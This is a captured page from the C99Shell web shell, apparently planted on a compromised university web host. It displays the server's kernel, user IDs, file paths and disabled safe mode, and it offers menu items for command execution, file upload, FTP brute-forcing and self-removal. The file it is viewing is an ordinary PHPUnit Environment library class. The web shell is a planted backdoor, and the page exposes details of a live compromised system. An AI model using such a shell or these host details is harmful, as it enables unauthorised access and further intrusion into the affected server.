!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/sebastian/environment/src/   drwxr-xr-x
Free 116.83 GB of 200.55 GB (58.26%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Console.php (2.97 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * This file is part of the Environment package.
 *
 * (c) Sebastian Bergmann <sebastian@phpunit.de>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace SebastianBergmann\Environment;

/**
 */
class Console
{
    const 
STDIN  0;
    const 
STDOUT 1;
    const 
STDERR 2;

    
/**
     * Returns true if STDOUT supports colorization.
     *
     * This code has been copied and adapted from
     * Symfony\Component\Console\Output\OutputStream.
     *
     * @return bool
     */
    
public function hasColorSupport()
    {
        if (
DIRECTORY_SEPARATOR == '\\') {
            return 
false !== getenv('ANSICON') || 'ON' === getenv('ConEmuANSI') || 'xterm' === getenv('TERM');
        }

        if (!
defined('STDOUT')) {
            return 
false;
        }

        return 
$this->isInteractive(STDOUT);
    }

    
/**
     * Returns the number of columns of the terminal.
     *
     * @return int
     */
    
public function getNumberOfColumns()
    {
        if (
DIRECTORY_SEPARATOR == '\\') {
            
$columns 80;

            if (
preg_match('/^(\d+)x\d+ \(\d+x(\d+)\)$/'trim(getenv('ANSICON')), $matches)) {
                
$columns $matches[1];
            } elseif (
function_exists('proc_open')) {
                
$process proc_open(
                    
'mode CON',
                    array(
                        
=> array('pipe''w'),
                        
=> array('pipe''w')
                    ),
                    
$pipes,
                    
null,
                    
null,
                    array(
'suppress_errors' => true)
                );

                if (
is_resource($process)) {
                    
$info stream_get_contents($pipes[1]);

                    
fclose($pipes[1]);
                    
fclose($pipes[2]);
                    
proc_close($process);

                    if (
preg_match('/--------+\r?\n.+?(\d+)\r?\n.+?(\d+)\r?\n/'$info$matches)) {
                        
$columns $matches[2];
                    }
                }
            }

            return 
$columns 1;
        }

        if (!
$this->isInteractive(self::STDIN)) {
            return 
80;
        }

        if (
function_exists('shell_exec') && preg_match('#\d+ (\d+)#'shell_exec('stty size'), $match) === 1) {
            if ((int) 
$match[1] > 0) {
                return (int) 
$match[1];
            }
        }

        if (
function_exists('shell_exec') && preg_match('#columns = (\d+);#'shell_exec('stty'), $match) === 1) {
            if ((int) 
$match[1] > 0) {
                return (int) 
$match[1];
            }
        }

        return 
80;
    }

    
/**
     * Returns if the file descriptor is an interactive terminal or not.
     *
     * @param int|resource $fileDescriptor
     *
     * @return bool
     */
    
public function isInteractive($fileDescriptor self::STDOUT)
    {
        return 
function_exists('posix_isatty') && @posix_isatty($fileDescriptor);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0111 ]--